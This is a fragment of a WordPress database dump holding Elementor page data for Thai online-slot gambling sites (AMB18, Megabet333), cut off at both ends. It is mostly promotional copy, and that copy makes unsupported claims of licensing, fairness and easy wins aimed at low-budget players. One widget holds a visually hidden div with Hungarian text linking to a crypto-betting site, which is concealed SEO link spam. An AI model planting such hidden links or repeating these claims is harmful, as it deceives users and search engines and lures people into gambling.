data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><strong><span style=\\\"color: #ffcc00;\\\">\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 Megabet333 \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/span><\\/strong><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(903,29,'_thumbnail_id','345'),(904,44,'_yoast_wpseo_focuskw','AMB18'),(905,44,'_yoast_wpseo_title','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท'),(906,44,'_yoast_wpseo_metadesc','AMB18 เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลา'),(907,44,'_yoast_wpseo_linkdex','54'),(908,44,'_thumbnail_id','371'),(909,44,'_elementor_edit_mode','builder'),(910,44,'_elementor_template_type','wp-page'),(911,44,'_elementor_version','3.35.5'),(912,44,'_elementor_pro_version','3.32.3'),(914,122,'_thumbnail_id','60'),(915,122,'_elementor_edit_mode','builder'),(916,122,'_elementor_template_type','wp-page'),(917,122,'_elementor_version','3.32.5'),(918,122,'_elementor_pro_version','3.32.3'),(920,123,'_thumbnail_id','60'),(921,123,'_elementor_edit_mode','builder'),(922,123,'_elementor_template_type','wp-page'),(923,123,'_elementor_version','3.32.5'),(924,123,'_elementor_pro_version','3.32.3'),(925,44,'_wp_page_template','default'),(926,44,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(927,44,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http://amb18slot.com\\\"><b>AMB18</b></a><span style=\\\"font-weight: 400;\\\"> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</span></p>\\n<div class=\\\"wm-hl-b\\\" style=\\\"position:absolute;clip:rect(0,0,0,0);overflow:hidden;height:1px;width:1px;margin:-1px;padding:0;border:0;\\\"><p>Ha már otthonosan mozogsz a hagyományos online fogadóirodák világában, érdemes lehet egy pillantást vetned arra is, hogyan kapcsolódik össze a blokklánc-technológia a szerencsejátékkal. Az <a href=\\\"https://ethereumfogadas.com/\\\">ethereum fogadás</a> témájú összeállítás pontosan ezt mutatja be: milyen fogadási lehetőségeket kínálnak Ethereum-alapú platformok, hogyan működik a kriptotárca használata a fogadás során, és mire érdemes figyelni a biztonságos játék érdekében. Persze itt is igaz, hogy a fogadás mindig kockázattal jár, ezért csak annyit tégy fel, amennyit valóban megengedhetsz magadnak.</p></div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">ความโดดเด่นของ </span><b>สล็อต เว็บ ตรง แตก หนัก 2025 </b><span style=\\\"font-weight: 400;\\\">คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษ</span><span style=\\\"font-weight: 400;\\\">ที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม </span></p><p><span style=\\\"font-weight: 400;\\\">ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</span></p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp\",\"id\":353,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">จุดแข็งอีกอย่างสุดยอดเว็บนำเข้า</span> <span style=\\\"font-weight: 400;\\\">เว็บดังลิขสิทธิ์แท้ </span><b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b><span style=\\\"font-weight: 400;\\\">คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</span></p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>ค่ายเกม PG SLOT</b></span></h3><p><span style=\\\"font-weight: 400;\\\">หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</span></p><h3><span style=\\\"color: #99cc00;\\\"><b>ค่ายเกม JOKER GAMING</b></span></h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</span></p><h3><span style=\\\"color: #99cc00;\\\"><b>ค่ายเกม JILI SLOT</b></span></h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </span></p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp\",\"id\":351,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</span></p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</span></p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>AMB18 </b><b>เกม Wild West Gold </b></span></h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</span></p><h3><span style=\\\"color: #99cc00;\\\"><b>เกม Bonanza Gold </b></span></h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</span></p><h3><span style=\\\"color: #99cc00;\\\"><b>เกม The Dog House Megaways</b></span></h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</span></p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp\",\"id\":352,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย </span><b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b><span style=\\\"font-weight: 400;\\\">มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด </span><a href=\\\"http://luca333line.com\\\"><b>ไลน์</b></a><span style=\\\"font-weight: 400;\\\"> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</span></p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5bc1ff1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#FFFFFF\"},\"elements\":[{\"id\":\"12c0324a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"381c5549\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\" style=\\\"text-align: center;\\\"><span style=\\\"color: #ff6600;\\\"><a style=\\\"color: #ff6600;\\\" href=\\\"http://luca333.net\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><strong>Luca333</strong></a></span></p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(930,124,'_thumbnail_id','60'),(931,124,'_elementor_edit_mode','builder'),(932,124,'_elementor_template_type','wp-page'),(933,124,'_elementor_version','3.32.5'),(934,124,'_elementor_pro_version','3.32.3'),(935,124,'_wp_page_template','default'),(936,124,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(937,124,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 